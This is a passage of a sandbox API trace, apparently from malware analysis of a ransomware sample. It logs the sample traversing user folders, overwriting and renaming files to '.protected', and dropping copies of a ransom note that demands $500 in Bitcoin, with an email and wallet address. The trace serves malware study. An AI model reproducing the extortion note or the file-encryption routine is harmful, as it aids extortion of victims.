(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 86 [0085.968] StrStrW (lpFirst="Settings.ini", lpSrch=".rar") returned 0x0 [0085.968] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 86 [0085.968] StrStrW (lpFirst="Settings.ini", lpSrch=".zip") returned 0x0 [0085.968] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x54, lpOverlapped=0x0) returned 1 [0085.969] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffffac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.969] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x54, lpOverlapped=0x0) returned 1 [0085.969] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.969] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.969] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.969] CloseHandle (hObject=0x14c) returned 1 [0085.970] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.protected") returned 96 [0085.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini.protected")) returned 1 [0085.970] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.970] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.970] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\RESTORE_FILES.txt") returned 91 [0085.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.982] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.982] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.982] lstrlenA (lpString="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") returned 684 [0085.982] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.983] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.983] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0085.983] CloseHandle (hObject=0xd8) returned 1 [0085.983] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0085.983] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0085.983] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RESTORE_FILES.txt") returned 75 [0085.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0085.984] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.984] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0085.984] lstrlenA (lpString="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") returned 684 [0085.984] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0085.984] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.984] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0085.985] CloseHandle (hObject=0xd4) returned 1 [0085.985] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0085.985] lstrcmpiW (lpString1="Microsoft Help", lpString2="Windows") returned -1 [0085.985] lstrcmpiW (lpString1="Microsoft Help", lpString2="Program Files") returned -1 [0085.985] lstrcmpiW (lpString1="Microsoft Help", lpString2="Program Files (x86)") returned -1 [0085.985] lstrcmpiW (lpString1="Microsoft Help", lpString2="$Recycle.bin") returned 1 [0085.986] lstrcmpiW (lpString1="Microsoft Help", lpString2="System Volume Information") returned -1 [0085.986] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help") returned 62 [0085.986] lstrcmpW (lpString1="Microsoft Help", lpString2=".") returned 1 [0085.986] lstrcmpW (lpString1="Microsoft Help", lpString2="..") returned 1 [0085.986] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\*") returned 64 [0085.986] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0085.986] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.986] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.986] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.986] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.986] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.986] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\.") returned 64 [0085.986] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.986] 
FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.986] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.986] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.986] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.986] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.986] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.986] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\..") returned 65 [0085.986] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.987] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.987] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0085.987] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0085.987] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\RESTORE_FILES.txt") returned 80 [0085.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft help\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0085.987] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.987] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0085.988] lstrlenA (lpString="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") returned 684 [0085.988] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0085.988] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.988] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0085.988] CloseHandle (hObject=0xd4) returned 1 [0085.990] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0085.990] lstrcmpiW (lpString1="Mozilla", lpString2="Windows") returned -1 [0085.990] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files") returned -1 [0085.990] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files (x86)") returned -1 [0085.990] lstrcmpiW (lpString1="Mozilla", lpString2="$Recycle.bin") returned 1 [0085.990] lstrcmpiW (lpString1="Mozilla", lpString2="System Volume Information") returned -1 [0085.990] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla") returned 55 [0085.990] lstrcmpW (lpString1="Mozilla", lpString2=".") returned 1 [0085.990] lstrcmpW (lpString1="Mozilla", lpString2="..") returned 1 [0085.990] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*") returned 57 [0085.990] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0085.990] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.990] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.990] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.990] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") 
returned 1 [0085.990] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.990] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\.") returned 57 [0085.990] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.990] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.990] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.990] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.990] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.990] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.990] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.990] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\..") returned 58 [0085.990] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.990] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.990] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.990] lstrcmpiW (lpString1="Firefox", lpString2="Windows") returned -1 [0085.991] lstrcmpiW (lpString1="Firefox", lpString2="Program Files") returned -1 [0085.991] lstrcmpiW (lpString1="Firefox", lpString2="Program Files (x86)") returned -1 [0085.991] lstrcmpiW (lpString1="Firefox", lpString2="$Recycle.bin") returned 1 [0085.991] lstrcmpiW (lpString1="Firefox", lpString2="System Volume Information") returned -1 [0085.991] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox") returned 63 [0085.991] lstrcmpW (lpString1="Firefox", lpString2=".") returned 1 [0085.991] lstrcmpW (lpString1="Firefox", lpString2="..") 
returned 1 [0085.991] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\*") returned 65 [0085.991] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.015] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.015] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.015] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.015] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.015] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.015] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\.") returned 65 [0086.015] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.015] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.015] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.015] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.015] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.015] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.015] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.015] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\..") returned 66 [0086.015] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.015] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.015] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.015] lstrcmpiW 
(lpString1="Profiles", lpString2="Windows") returned -1 [0086.015] lstrcmpiW (lpString1="Profiles", lpString2="Program Files") returned -1 [0086.015] lstrcmpiW (lpString1="Profiles", lpString2="Program Files (x86)") returned -1 [0086.015] lstrcmpiW (lpString1="Profiles", lpString2="$Recycle.bin") returned 1 [0086.015] lstrcmpiW (lpString1="Profiles", lpString2="System Volume Information") returned -1 [0086.015] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 72 [0086.015] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1 [0086.015] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1 [0086.015] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*") returned 74 [0086.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0086.016] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.016] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.016] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.016] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.016] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.016] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\.") returned 74 [0086.016] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.016] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.016] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.016] lstrcmpiW 
(lpString1="..", lpString2="Program Files") returned -1 [0086.016] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.016] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.016] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.016] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\..") returned 75 [0086.016] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.016] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.016] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.016] lstrcmpiW (lpString1="silmbjec.default", lpString2="Windows") returned -1 [0086.016] lstrcmpiW (lpString1="silmbjec.default", lpString2="Program Files") returned 1 [0086.016] lstrcmpiW (lpString1="silmbjec.default", lpString2="Program Files (x86)") returned 1 [0086.016] lstrcmpiW (lpString1="silmbjec.default", lpString2="$Recycle.bin") returned 1 [0086.016] lstrcmpiW (lpString1="silmbjec.default", lpString2="System Volume Information") returned -1 [0086.016] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 89 [0086.016] lstrcmpW (lpString1="silmbjec.default", lpString2=".") returned 1 [0086.016] lstrcmpW (lpString1="silmbjec.default", lpString2="..") returned 1 [0086.017] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*") returned 91 [0086.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 
0x47bad0 [0086.046] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.046] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.046] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.046] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.046] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.046] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\.") returned 91 [0086.046] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.046] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.046] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.046] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.046] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.046] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.046] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.046] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\..") returned 92 [0086.046] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.046] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.046] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.046] lstrcmpiW (lpString1="Cache", lpString2="Windows") returned -1 [0086.046] lstrcmpiW (lpString1="Cache", lpString2="Program Files") returned -1 [0086.046] lstrcmpiW (lpString1="Cache", lpString2="Program Files (x86)") returned -1 [0086.046] lstrcmpiW (lpString1="Cache", lpString2="$Recycle.bin") returned 1 [0086.046] lstrcmpiW 
